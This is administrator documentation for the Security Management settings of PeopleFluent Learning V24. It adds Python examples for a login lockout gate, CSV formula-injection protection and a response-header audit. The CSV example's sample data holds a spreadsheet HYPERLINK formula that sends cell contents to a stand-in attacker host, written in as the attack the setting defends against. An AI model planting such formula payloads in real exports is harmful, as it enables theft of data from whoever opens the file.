System Administration - Security Management Category
Applicable Product:
- PeopleFluent Learning
Applicable Release:
- V24
Summary:
Security Management Category
System administrators can use the table below to help them configure the system configuration settings in the Security Management category.
To configure Security Management settings, go to Manage Center > System > System Configuration and select Security Management from the Select a category drop-down list.
Table: System Configuration Settings: Security Management Category
Setting | Type | Description |
Security Scan Level of Input Parameters | Drop-down list | Select the level of input validation applied to data submitted through browser form fields and saved to the LMS:
Scanning actions are based on OWASP best practice guidelines. Recommended setting: High. |
Advanced: Allow Persistent Sessions (Session Hijacking) | Check box |
Select this check box to allow persistent sessions, so that a new login request can reuse a previous session cookie. This is the behaviour that session hijacking (and session fixation) attacks rely on. Clear this check box to prevent new requests from reusing a previous session cookie. When this check box is cleared, a new login (or logoff) invalidates any existing login with the same user ID. PeopleFluent recommends disabling persistent sessions, although that may inconvenience some users by requiring a new login in some link and server restart scenarios. Recommended setting: disabled. |
Advanced: Allow Concurrent Logins | Check box |
Select this check box to allow multiple concurrent logins with the same user ID. Recommended setting: disabled. |
Advanced: IFrame Protection (Clickjacking) | Single selection |
To prevent external websites from framing LMS pages inside their own pages, which is the basis of clickjacking attacks, select Allow same origin only. Select None only where external sites, such as portals, legitimately embed LMS screens in frames. For more information about clickjacking, see the OWASP guidelines at owasp.org. Recommended setting: Allow same origin only. |
Advanced: Disable Previous Sessions At Login | Check box |
Select this check box to allow the current login request to take precedence over previous sessions immediately, without waiting for the previous session timer (which may be 1-4 hours) to expire. This option improves usability when both the Allow Persistent Sessions and Allow Concurrent Logins settings are disabled. Recommended setting: enabled. |
Advanced: Enforce IP Session Binding | Check box |
Select this check box to require that all subsequent requests in a session come from the IP address used at login. This can protect against session hijacking, with two caveats: offices behind a gateway or proxy present the same IP address for every user on that network, so the check does not distinguish between them; and users whose address changes mid-session (mobile networks, some load-balanced proxies) will be logged out. The setting may also need to be disabled where remote courses or portals are served from third-party servers. Recommended setting: enabled. |
Maximum Failed Log-In Attempts | Number (Min=0, Max=20) |
Enter the maximum number of failed login attempts before the user's account status is set to Suspended. This limits online password-guessing attacks against known user IDs. Note that an attacker who knows a user ID can also use this to lock that user out deliberately, so pair it with a finite Suspension Interval. Recommended setting: 5. |
Suspension Interval (# minutes) | Number (Min=0, Max=120) |
Enter the number of minutes to suspend the user account when the Maximum Failed Login Attempts has been exceeded. Enter 0 to suspend the account indefinitely or until it is reactivated by an administrator. Recommended setting: 15. |
Minimum Password Length | Number (Min=1, Max=15) |
Enter the minimum character length for user passwords. Recommended setting: 15. |
Enable Multi-Factor Authentication | Check box |
Select this check box to enable multi-factor authentication (MFA) for all users. Recommended setting: enabled. |
Multi-Factor Authentication re-authentication period (Days) | Number (Min=1, Max=90) |
The number of days after a successful MFA challenge before a user must complete MFA again at login. Recommended setting: 30. |
Multi-Factor Authentication code validity period (Minutes) | Number (Min=1, Max=60) |
The number of minutes that the one time passcode is valid. The code will immediately become invalid if the current login attempt fails. Recommended setting: 5 |
Maximum number of Multi-Factor Authentication attempts | Number (Min=1, Max=15) |
The maximum number of MFA attempts before the account is locked. Recommended setting: 5 |
Password Change Interval (# days) | Number (Min=0, Max=99999) |
Enter the number of days since the last password change after which users are prompted for a new password. The interval is checked each time users log in. Recommended setting: 0. |
Maximum Days of Inactivity Allowed for Accounts | Number (Min=0, Max=365) |
Enter the maximum number of days' inactivity before the user's account status is set to either Closed or Suspended, depending on whether the Set Inactive Accounts to Suspended setting is enabled or not. Recommended setting: 0. |
Force First Log-In Password Change | Check box |
Select this check box to force users to change their password the first time they log into the LMS. Recommended setting: enabled. |
Require Strong Passwords | Check box |
Select this check box to require users to choose a password that is difficult to guess. A strong password must contain a mix of alphanumeric characters, be at least six characters long, and must not contain simple phrases such as abc123, qwerty and password. Recommended setting: enabled. |
Number of Previous Passwords That Cannot Be Reused | Number (Min=1, Max=99) |
Enter the number of previous passwords—going backwards from the current password—that cannot be reused when setting a new password. This setting requires the Require Strong Passwords setting to be enabled. Recommended setting: 5. |
Number of Digit(s) in a Strong Password | Number (Min=0, Max=2) |
Enter the number of digits that must be present in a strong password. This setting requires the Require Strong Passwords setting to be enabled. Recommended setting: 1. |
Number of Special Character(s) in a Strong Password | Number (Min=0, Max=2) |
Enter the number of special characters that must be present in a strong password. Special characters are non-alphanumeric. This setting requires the Require Strong Passwords setting to be enabled. Recommended setting: 1. |
Set Inactive Accounts to Suspended | Check box |
Select this check box to set inactive user accounts to Suspended instead of Closed. Recommended setting: disabled. |
Allow Catalog Level Permissions for Session Selector | Check box |
Select this check box to use only catalog level read permissions to filter the learning object session selector in report queries. Clear the check box to use catalog, module and session level permissions. This setting is included for backwards compatibility and PeopleFluent recommends clearing it to use module and session level permissions. Recommended setting: disabled. |
Enable CSRF validation for login requests. | Check box |
Select this check box to enable cross-site request forgery (CSRF) protection on the native LMS login page. A token value is added to the login form and validated when the form is submitted. Recommended setting: enabled. Customers who use external login pages must leave this check box cleared: those pages do not submit the token and their login requests would otherwise be rejected. |
Repository Permissions Level | Single selection |
Select Files to apply access permissions to files (in addition to folders) in the Repository Manager. Select Folders to apply access permissions at the folder level only. If the repository contains a lot of files, selecting Folders can greatly improve LMS performance. Recommended setting: Folders. |
Minimal Authentication Response | Check box |
Select this check box to return a single response code for all login failures, so that an attacker cannot tell from the response whether a user ID exists, is suspended, or simply had the wrong password (account enumeration). Returning as little information as possible to an attacker is a security best practice. Recommended setting: enabled. |
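The lockout behaviour of Maximum Failed Log-In Attempts and Suspension Interval, combined with the single failure code of Minimal Authentication Response, as an added example in Python (not PeopleFluent Learning code). The account store, hashing scheme and the `LoginGate` class are illustrative; treating Maximum Failed Log-In Attempts = 0 as "no lockout" is an assumption, since the page does not say what 0 means for that setting. Times are Unix timestamps so the scenario can be replayed without a clock.

```python
"""Added example (not PeopleFluent Learning code): lockout + minimal auth response."""
import hashlib
import hmac
import secrets
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass
class Account:
    salt: bytes
    password_hash: bytes
    failed_attempts: int = 0
    suspended_until: Optional[float] = None  # timed suspension (Suspension Interval > 0)
    suspended_indefinitely: bool = False     # Suspension Interval = 0: admin must reactivate


def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)


class LoginGate:
    GENERIC_FAILURE = "AUTH_FAILED"  # the only failure code clients ever see

    def __init__(self, max_failed_attempts: int = 5, suspension_minutes: int = 15,
                 minimal_response: bool = True) -> None:
        self.max_failed_attempts = max_failed_attempts  # 0 = no lockout (assumption)
        self.suspension_minutes = suspension_minutes    # 0 = indefinite, per the page
        self.minimal_response = minimal_response
        self.accounts: Dict[str, Account] = {}

    def register(self, user_id: str, password: str) -> None:
        salt = secrets.token_bytes(16)
        self.accounts[user_id] = Account(salt, _hash(password, salt))

    def reactivate(self, user_id: str) -> None:
        """Administrator action: lifts an indefinite (or timed) suspension."""
        acct = self.accounts[user_id]
        acct.failed_attempts = 0
        acct.suspended_until = None
        acct.suspended_indefinitely = False

    def _fail(self, detail: str) -> str:
        # With Minimal Authentication Response the reason is never disclosed, so an
        # attacker cannot tell "no such user" from "wrong password" or "suspended".
        return self.GENERIC_FAILURE if self.minimal_response else detail

    def _is_suspended(self, acct: Account, now_ts: float) -> bool:
        if acct.suspended_indefinitely:
            return True
        if acct.suspended_until is not None:
            if now_ts < acct.suspended_until:
                return True
            acct.suspended_until = None  # interval elapsed: the counter starts over
            acct.failed_attempts = 0
        return False

    def login(self, user_id: str, password: str, now_ts: float) -> str:
        acct = self.accounts.get(user_id)
        if acct is None:
            return self._fail("NO_SUCH_USER")
        if self._is_suspended(acct, now_ts):
            return self._fail("SUSPENDED")  # attempts during suspension are not counted
        if hmac.compare_digest(_hash(password, acct.salt), acct.password_hash):
            acct.failed_attempts = 0
            return "OK"
        acct.failed_attempts += 1
        if self.max_failed_attempts and acct.failed_attempts >= self.max_failed_attempts:
            if self.suspension_minutes == 0:
                acct.suspended_indefinitely = True
            else:
                acct.suspended_until = now_ts + self.suspension_minutes * 60
        return self._fail("BAD_PASSWORD")
```

Constructing the gate with `minimal_response=False` shows what the setting prevents: the distinct `NO_SUCH_USER`, `SUSPENDED` and `BAD_PASSWORD` codes let an attacker confirm which user IDs exist and which accounts they have already locked.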
Disallowed File Extensions | Text | Enter a comma-separated list of file extensions to specify the file types that cannot be imported into the LMS, to reduce security risks. For example, .exe,.bat,.jsp. A blocklist only stops the extensions you list; the Allowed General User File Extensions setting below provides the allowlist applied to ordinary users. |
Allowed General User File Extensions | Text |
Enter a comma-separated list of file extensions to specify the file types that do not require special role permissions to be uploaded to the LMS. This list is checked wherever a user can upload files (for example, skins, content packages and repository items). Leave this field blank to allow all file types to be uploaded. Example file types typically uploaded can include:
|
Enforce No-Store Header Response | Check box |
Select this check box to send the Cache-Control: no-store directive in HTTP responses, so that browsers and intermediate caches do not store them. This does not prevent a valid, previously cached response from being returned. Recommended setting: enabled. |
Trusted apps | Text box |
Enter a list of trusted apps, one per line, for example:
talentslate:///oauth
http://www.lmsserver.com/folder/netdimensions-slate/sso |
Enforce Repository Access Control on Secure Servlet | Check box |
Select this check box to enforce access permission rules when accessing repository files via a secure servlet. Recommended setting: enabled. |
Enable spreadsheet formula injection protection | Check box |
Select this check box to protect the LMS from spreadsheet formula injection attempts. When enabled, any field in CSV or XLS output that begins with one of the following characters is prefixed with a single quote, so that a spreadsheet application treats it as text rather than a formula:
Recommended setting: enabled. |
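The single-quote neutralisation this setting applies to exported reports, as an added example in Python (not PeopleFluent Learning code), run against a constructed report in which one learner has set a formula as their display name. The page does not list the trigger characters the LMS checks; the set in `FORMULA_TRIGGERS` is the usual OWASP list and is an assumption, as are the function names.

```python
"""Added example (not PeopleFluent Learning code): CSV formula-injection protection."""
import csv
import io
from typing import Iterable, List, Sequence, Tuple

# Characters that spreadsheet applications treat as the start of a formula.
# Assumed set (the usual OWASP list); the page does not state which ones the LMS checks.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value: str) -> str:
    """Prefix a leading formula trigger with ' so spreadsheets render the cell as text."""
    if value and value[0] in FORMULA_TRIGGERS:
        return "'" + value
    return value


def export_csv(header: Sequence[str], rows: Iterable[Sequence[object]],
               protect: bool = True) -> str:
    """Write a report as CSV; with protect=True every field is neutralised first."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    writer.writerow(header)
    for row in rows:
        cells = [str(c) for c in row]
        writer.writerow([neutralize_cell(c) for c in cells] if protect else cells)
    return buf.getvalue()


def risky_cells(rows: Iterable[Sequence[object]]) -> List[Tuple[int, int]]:
    """Audit helper: (row, column) of every cell the protection would rewrite."""
    return [(r, c) for r, row in enumerate(rows)
            for c, cell in enumerate(row) if neutralize_cell(str(cell)) != str(cell)]


# Constructed sample report. The HYPERLINK formula would exfiltrate the contents of
# cell A1 to attacker.example when an analyst clicks it; bob's score of -5 is legitimate.
HEADER = ("user_id", "display_name", "score")
SAMPLE_ROWS = [
    ("alice", "Alice Example", 95),
    ("mallory", '=HYPERLINK("http://attacker.example/?"&A1,"click")', 0),
    ("bob", "Bob Example", -5),
]
```

Two practical consequences follow from the protection applying to all fields: a legitimate negative number such as -5 is also prefixed and arrives as text, and the apostrophe is visible when the CSV is opened in a spreadsheet (CSV has no way to mark a cell as "text", so the quote is the cell content). `risky_cells` shows which cells of an existing export would be changed, which is useful before switching the setting on.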
Enable cross-site scripting protection | Drop-down list |
Select the level of protection from cross-site scripting (XSS). This option sets the X-XSS-Protection HTTP response header; with Enable and block, a browser that honours the header stops loading a page in which it detects a reflected XSS attack. Current Chromium-based browsers and Firefox ignore this header, so treat it as defence in depth for older browsers and rely on the Content Security Policy setting as the effective control. Recommended setting: Enable and block. |
Disable content sniffing | Check box |
Select this check box to add an X-Content-Type-Options: nosniff header to HTTP responses. This indicates that the MIME types advertised in the Content-Type headers must be followed and should not be changed. This setting provides a way to opt out of MIME type sniffing, or, in other words, to say that the MIME types are deliberately configured. Recommended setting: enabled. |
Enable Referrer Policy | Drop-down list |
Select an option to set the Referrer-Policy response header, which determines what the browser sends in the Referer header when following links from the LMS to external sites. The default value is Strict origin when cross origin, which sends only the LMS origin (not the full URL) to other sites. |
Enable Permission Policy | Drop-down list |
This provides a mechanism to allow and deny the use of browser features, in this case, allowing the browser to make a PeopleFluent Learning window full screen. The default value is All. Select an option: |
Content Security Policy | Text box |
This option defines approved sources of content (such as JavaScript and CSS) that the browser may load, sent as the Content-Security-Policy header. It can be an effective countermeasure to cross-site scripting (XSS) attacks. The header value is made up of one or more directives; separate multiple directives with a semicolon. The default for this setting is script-src 'self' 'unsafe-inline' 'unsafe-eval';, which keeps existing inline scripts working but gives little XSS protection, because 'unsafe-inline' and 'unsafe-eval' allow injected inline script and eval() to run. Tighten the policy as far as the skins and content in use allow. |
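A check of the response headers that the browser-protection settings in this category control (content sniffing, XSS protection, referrer policy, no-store, frame protection and the Content Security Policy), as an added example in Python (not PeopleFluent Learning code), run against two constructed header sets. Mapping "IFrame Protection: Allow same origin only" to X-Frame-Options: SAMEORIGIN is an assumption about how the LMS emits that setting; the other header names and values are the ones named on this page. The function names are illustrative.

```python
"""Added example (not PeopleFluent Learning code): audit of security response headers."""
from typing import Dict, List

EXPECTED_HEADERS = {
    "x-content-type-options": "nosniff",                   # Disable content sniffing
    "x-xss-protection": "1;mode=block",                    # Enable and block
    "referrer-policy": "strict-origin-when-cross-origin",  # Referrer Policy default
    "x-frame-options": "sameorigin",                       # IFrame Protection (assumed header)
}
WEAK_SCRIPT_SOURCES = ("'unsafe-inline'", "'unsafe-eval'")


def parse_csp(value: str) -> Dict[str, List[str]]:
    """Split a Content-Security-Policy value into {directive: [sources]}."""
    directives: Dict[str, List[str]] = {}
    for directive in value.split(";"):
        parts = directive.split()
        if parts:
            directives[parts[0].lower()] = parts[1:]
    return directives


def audit_headers(headers: Dict[str, str]) -> List[str]:
    """Return one finding per header that deviates from the recommended settings."""
    h = {k.lower(): v.strip() for k, v in headers.items()}
    findings: List[str] = []
    for name, want in EXPECTED_HEADERS.items():
        got = h.get(name)
        if got is None:
            findings.append(f"{name}: missing (expected '{want}')")
        elif got.lower().replace(" ", "") != want:
            findings.append(f"{name}: '{got}' (expected '{want}')")
    cache = [d.strip().lower() for d in h.get("cache-control", "").split(",")]
    if "no-store" not in cache:
        findings.append("cache-control: 'no-store' not present (Enforce No-Store Header Response)")
    csp = h.get("content-security-policy")
    if csp is None:
        findings.append("content-security-policy: missing")
    else:
        directives = parse_csp(csp)
        # script-src falls back to default-src when it is not set explicitly
        script = directives.get("script-src", directives.get("default-src", []))
        for weak in WEAK_SCRIPT_SOURCES:
            if weak in script:
                findings.append(f"content-security-policy: script-src allows {weak}")
    return findings


def fetch_headers(url: str) -> Dict[str, str]:
    """Fetch one response's headers for a live check against your own LMS."""
    import urllib.request
    with urllib.request.urlopen(url) as resp:
        return dict(resp.headers.items())


# Constructed sample 1: the page's default CSP with frame protection off and no no-store.
DEFAULT_RESPONSE = {
    "Content-Type": "text/html; charset=UTF-8",
    "X-Content-Type-Options": "nosniff",
    "X-XSS-Protection": "1; mode=block",
    "Referrer-Policy": "strict-origin-when-cross-origin",
    "Content-Security-Policy": "script-src 'self' 'unsafe-inline' 'unsafe-eval';",
    "Cache-Control": "no-cache",
}

# Constructed sample 2: every setting in this category at its recommended value,
# with a CSP that drops the unsafe sources.
HARDENED_RESPONSE = {
    "Content-Type": "text/html; charset=UTF-8",
    "X-Content-Type-Options": "nosniff",
    "X-XSS-Protection": "1; mode=block",
    "Referrer-Policy": "strict-origin-when-cross-origin",
    "X-Frame-Options": "SAMEORIGIN",
    "Content-Security-Policy": "default-src 'self'; script-src 'self'; frame-ancestors 'self'",
    "Cache-Control": "no-store, no-cache",
}
```

Run `audit_headers(fetch_headers("https://your-lms.example/"))` after changing a setting to confirm the header actually reached the browser; a reverse proxy or CDN in front of the LMS can strip or override these headers, which is the most common reason a setting appears not to work.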